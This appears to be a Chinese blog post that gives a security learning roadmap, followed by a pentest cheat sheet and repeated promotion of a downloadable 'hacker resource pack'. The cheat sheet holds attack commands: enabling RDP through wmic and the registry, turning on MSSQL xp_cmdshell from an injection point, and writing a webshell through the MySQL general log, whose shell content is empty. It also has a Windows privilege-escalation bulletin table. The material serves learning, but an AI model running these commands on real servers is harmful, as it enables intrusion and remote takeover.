核心：1.web安全2.二进制安全（包括逆向工程和漏洞利用）3.密码学知识其他基础：1.软件开发2.数据库原理3.编程语言4.计算机取证分析和隐写术①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析5.网络协议及网络算法6.算法与数据结构7.研究开源工具的基本原理，懂得自制工具Web安全：1.注入类：SQL注入；XSS跨站脚本攻击；XXE；命令执行命令注入（bash）；文件上传文件下载2.信息漏洞：源码泄露；敏感信息接口；员工资料泄露；服务器信息泄露3.逻辑类：权限绕过；条件竞争；数据篡改网站工作原理：HTTP协议；WebserverHTTP协议构成：1.http-header构成（request response）2.http-body 构成（request response）3.http方法Webserver：1.Webserver分类2.Webserver解析流程3.Webserver基础安全编程语言：前端：html，css，javascript后台和脚本语言：php，java，python数据库原理：关系型数据库（MySQL）和非关系型数据库逆向工程：1.体系结构：机器指令和汇编语言2.编译原理：自动机，词法分析，语法分析3.操作系统：系统的加载与引导4.计算机组成原理漏洞挖掘与利用：1.逆向工程2.模糊测试3.什么是漏洞4.程序员在什么时候会犯错5.信息收集工具：端口，子域名，代码泄露，员工字典6.数据包抓取修改重放工具7.顺手的浏览器及插件（火狐Hackbar）8.VPS，漏洞验证9.分析业务功能10.分析web架构11.针对性的罗列可能的漏洞类型12.详细测试：不放过任何一个数据包13.单一利用：Getshell；敏感信息接口14.组合利用：XSS+CSRF密码学：1.古典密码学：凯撒密码；移位密码2.现代密码学：对称加密体系（DES；AES）和非对称加密体系（RSA）Win2003wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Win2003，WinXPREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Mssql开启xp_cmdshell关闭命令EXEC sp_configure 'show advanced options', 1; //显示或修改高级选项

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell',0;

RECONFIGURE;

开启命令EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

在注入点运行上述语句时,如果出现这样的回显,标记message: 配置选项 ‘xp_cmdshell’ 不存在,可执行以下语句

EXEC sp_configure 'show advanced options',1;

RECONFIGURE;

EXEC sp_configure 'user connections',1;

RECONFIGURE;

Mysql日志拿shellset global general_log = on;

set global general_log_file = 'C:/phpStudy/WWW/sinight.php';

select '';

set global general_log = off;

Windows提权对照表#Security Bulletin #KB #Description #Operating System

CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)

MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)

MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)

MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)

MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)

MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)

MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)

MS15-097 [KB3089656] [remote code execution] (win8.1/2012)

MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)

MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)

MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)

MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)

MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)

MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)

MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)

MS14-070 [KB2989935] [Kernel Driver] (2003)

MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)

MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)

MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)

MS14-002 [KB2914368] [NDProxy] (2003/XP)

MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)

MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)

MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)

MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)

MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)

MS11-080 [KB2592799] [AFD.sys] (2003/XP)

MS11-062 [KB2566454] [NDISTAPI] (2003/XP)

MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)

MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)

MS10-092 [KB2305420] [Task Scheduler] (2008/7)

MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)

MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)

MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)

MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)

MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)

MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)

MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)

MS08-068 [KB957097] [Remote Code Execution] (2000/XP)

MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)

MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)

MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)

MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)

MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)

Win下面各种文件下载姿势

http://www.cnblogs.com/backlion/p/7908563.html https://www.freebuf.com/articles/system/155147.html

Python开启HTTP服务Python <= 2.3 python -c “import SimpleHTTPServer as s; s.test();” 8000 Python >= 2.4 python -m SimpleHTTPServer 8000 Python 3.x python -m http.server 8000各种文件上传姿势总结

https://github.com/cnnetarmy/uploadfile https://myzxcg.github.io/20171116.html

黑客学习资源推荐

​最后为了帮助大家更好的学习网络安全，小编给大家准备了一份网络安全入门/进阶学习资料，里面的内容都是适合零基础小白的笔记和资料，不懂编程也能听懂、看懂，所有资料共282G，朋友们如果有需要全套网络安全入门+进阶学习资源包。

😝有需要的小伙伴，可以点击下方链接免费领取

①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析1️⃣零基础入门① 学习路线对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

2️⃣视频配套资料&国内外网安书籍、文档① 文档和书籍资料② 黑客技术因篇幅有限，仅展示部分资料

如果你对网络安全入门感兴趣，需要的话可以在下方

3️⃣网络安全源码合集+工具包4️⃣网络安全面试题5️⃣汇总所有资料 ⚡️ ，朋友们如果有需要全套 《网络安全入门+进阶学习资源包》，扫码获取~